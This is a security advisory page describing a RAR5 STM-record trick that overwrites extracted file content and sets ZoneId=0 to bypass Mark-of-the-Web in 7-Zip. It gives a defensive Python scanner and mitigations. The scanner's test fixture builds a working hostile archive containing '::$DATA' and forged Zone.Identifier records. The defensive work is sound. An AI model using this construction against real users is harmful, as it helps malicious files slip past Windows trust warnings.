- 7zip
- motw
- windows
- rar5
- exploitarium
7-Zip RAR5 MotW/ADS Full-Chain PoC
Crafted RAR5 STM streams overwrite extracted file bytes and Zone.Identifier on 7-Zip 26.01 — MotW bypass chain.
Summary
The upstream proof-of-concept uses crafted RAR5 STM (NTFS stream) service records to rewrite both the main data stream and the Zone.Identifier stream of a file extracted by 7-Zip 26.01, so the extracted file ends up with attacker-chosen content and no effective Mark-of-the-Web. It is one of 30 folders in the Exploitarium collection. OFFSITE.DARK summarizes the upstream README and PoC design; we did not discover or weaponize this flaw.
Key Findings
| Finding | Detail |
|---|---|
| Product / target | 7-Zip 26.01 x64 (Windows NTFS) |
| CVE | No specific CVE given upstream; same 7-Zip MotW-propagation issue class as CVE-2025-0411 |
| Primitive | RAR5 STM (NTFS alternate-stream) service records named `::$DATA` (the file's main, unnamed data stream) and `:Zone.Identifier:$DATA` |
| Impact | The extracted file carries attacker-controlled visible content and a Zone.Identifier stream with ZoneId=0, even though the archive itself is Internet-zone (ZoneId=3) and 7-Zip propagates MotW to extracted files. |
Attack Chain
Build the RAR5 archive containing the STM records → mark the archive ZoneId=3 (Internet zone) → extract with 7-Zip's Zone.Identifier propagation switch `-snz1` → verify the extracted file's content and read back its Zone.Identifier stream (expected: attacker content, ZoneId=0)
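As an added example (not the Exploitarium PoC and not 7-Zip code), the scanner below shows what a defender can check before extracting: it walks RAR5 block headers and flags STM service records whose stream name is `::$DATA` (the owning file's main stream) or begins with `:Zone.Identifier`. It assumes the public RAR5 layout used by WinRAR/unrar: a service header named `STM` that carries the stream name in an extra record of type 0x07 (service subdata) and the stream bytes in its data area. The sample archive is constructed in-line with stored (method 0) entries purely as a test fixture; it is not a real capture and nothing here extracts anything.

```python
"""Flag RAR5 STM records that rewrite a file's main stream or its Zone.Identifier."""
import struct
import zlib

RAR5_SIG = b"Rar!\x1a\x07\x01\x00"
HEAD_MAIN, HEAD_FILE, HEAD_SERVICE, HEAD_ENDARC = 1, 2, 3, 5
HFL_EXTRA, HFL_DATA = 0x01, 0x02      # header flags: extra area / data area present
FFL_MTIME, FFL_CRC = 0x02, 0x04       # file flags: mtime / data CRC32 present
FHEXTRA_SUBDATA = 0x07                # extra record holding the STM stream name (assumed layout)


def vint_encode(n):
    """RAR5 variable-length int: 7 bits per byte, LSB first, MSB set = more bytes."""
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        out.append(b | 0x80 if n else b)
        if not n:
            return bytes(out)


def vint_decode(buf, pos):
    value = shift = 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos


def _subdata(extra):
    """Walk the extra area; return the subdata record (stream name) if present."""
    pos = 0
    while pos < len(extra):
        size, p = vint_decode(extra, pos)       # size counts from the type field
        rtype, q = vint_decode(extra, p)
        if rtype == FHEXTRA_SUBDATA:
            return extra[q:p + size].decode("utf-8", "replace")
        pos = p + size
    return None


def scan_rar5(blob):
    """Return suspicious STM records as dicts with file, stream, reason, payload."""
    if not blob.startswith(RAR5_SIG):
        raise ValueError("not a RAR5 archive")
    pos, owner, hits = len(RAR5_SIG), None, []
    while pos < len(blob):
        crc = struct.unpack_from("<I", blob, pos)[0]
        hsize, p = vint_decode(blob, pos + 4)
        hdr_end = p + hsize
        if zlib.crc32(blob[pos + 4:hdr_end]) != crc:
            raise ValueError("header CRC mismatch at offset %d" % pos)
        htype, p = vint_decode(blob, p)
        hflags, p = vint_decode(blob, p)
        extra_size = data_size = 0
        if hflags & HFL_EXTRA:
            extra_size, p = vint_decode(blob, p)
        if hflags & HFL_DATA:
            data_size, p = vint_decode(blob, p)
        if htype in (HEAD_FILE, HEAD_SERVICE):
            fflags, p = vint_decode(blob, p)
            _unpacked, p = vint_decode(blob, p)
            _attrs, p = vint_decode(blob, p)
            p += 4 * bool(fflags & FFL_MTIME) + 4 * bool(fflags & FFL_CRC)
            _comp, p = vint_decode(blob, p)
            _host, p = vint_decode(blob, p)
            nlen, p = vint_decode(blob, p)
            name = blob[p:p + nlen].decode("utf-8", "replace")
            if htype == HEAD_FILE:
                owner = name                    # STM records apply to the preceding file
            elif name == "STM":
                stream = _subdata(blob[hdr_end - extra_size:hdr_end]) or ""
                low = stream.lower()
                reason = None
                if low == "::$data":
                    reason = "rewrites the main (unnamed) data stream of the extracted file"
                elif low.startswith(":zone.identifier"):
                    reason = "supplies an attacker-chosen Zone.Identifier (MotW) stream"
                if reason:
                    hits.append({"file": owner, "stream": stream, "reason": reason,
                                 "payload": blob[hdr_end:hdr_end + data_size]})
        pos = hdr_end + data_size
        if htype == HEAD_ENDARC:
            break
    return hits


# --- constructed test fixture: a minimal stored RAR5 archive, not a real sample ---
def _block(htype, body, extra=b"", data=b""):
    flags = (HFL_EXTRA if extra else 0) | (HFL_DATA if data else 0)
    fields = vint_encode(htype) + vint_encode(flags)
    if extra:
        fields += vint_encode(len(extra))
    if data:
        fields += vint_encode(len(data))
    fields += body + extra
    hdr = vint_encode(len(fields)) + fields
    return struct.pack("<I", zlib.crc32(hdr)) + hdr + data


def _entry(htype, name, data, extra=b""):
    """File (2) or service (3) header, stored data, Windows host OS, CRC32 present."""
    body = (vint_encode(FFL_CRC) + vint_encode(len(data)) + vint_encode(0x20)
            + struct.pack("<I", zlib.crc32(data)) + vint_encode(0) + vint_encode(0)
            + vint_encode(len(name)) + name)
    return _block(htype, body, extra, data)


def _stm(stream_name, content):
    sub = vint_encode(1 + len(stream_name)) + vint_encode(FHEXTRA_SUBDATA) + stream_name
    return _entry(HEAD_SERVICE, b"STM", content, sub)


def build_sample_archive():
    """readme.txt followed by two hostile STM records and one benign one."""
    return (RAR5_SIG
            + _block(HEAD_MAIN, vint_encode(0))
            + _entry(HEAD_FILE, b"readme.txt", b"benign text\n")
            + _stm(b"::$DATA", b"attacker-chosen visible content\n")
            + _stm(b":Zone.Identifier:$DATA", b"[ZoneTransfer]\r\nZoneId=0\r\n")
            + _stm(b":notes", b"harmless extra stream\n")
            + _block(HEAD_ENDARC, vint_encode(0)))


if __name__ == "__main__":
    for h in scan_rar5(build_sample_archive()):
        print("%s%s -> %s (%d bytes)" % (h["file"], h["stream"], h["reason"], len(h["payload"])))
```

Run it against a real archive with `scan_rar5(open(path, "rb").read())`; any hit is a reason to refuse alternate-stream extraction for that file. For the final verification step of the chain on Windows, `Get-Content -Path <file> -Stream Zone.Identifier` in PowerShell reads back the stream that 7-Zip wrote, which is where a ZoneId=0 line would show up.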
Mitigation
Update 7-Zip to a build that fixes the STM handling; treat downloaded archives and everything extracted from them as untrusted regardless of whether a Zone.Identifier stream is present; do not rely on MotW alone, and enforce SmartScreen and AppLocker policy on extracted content.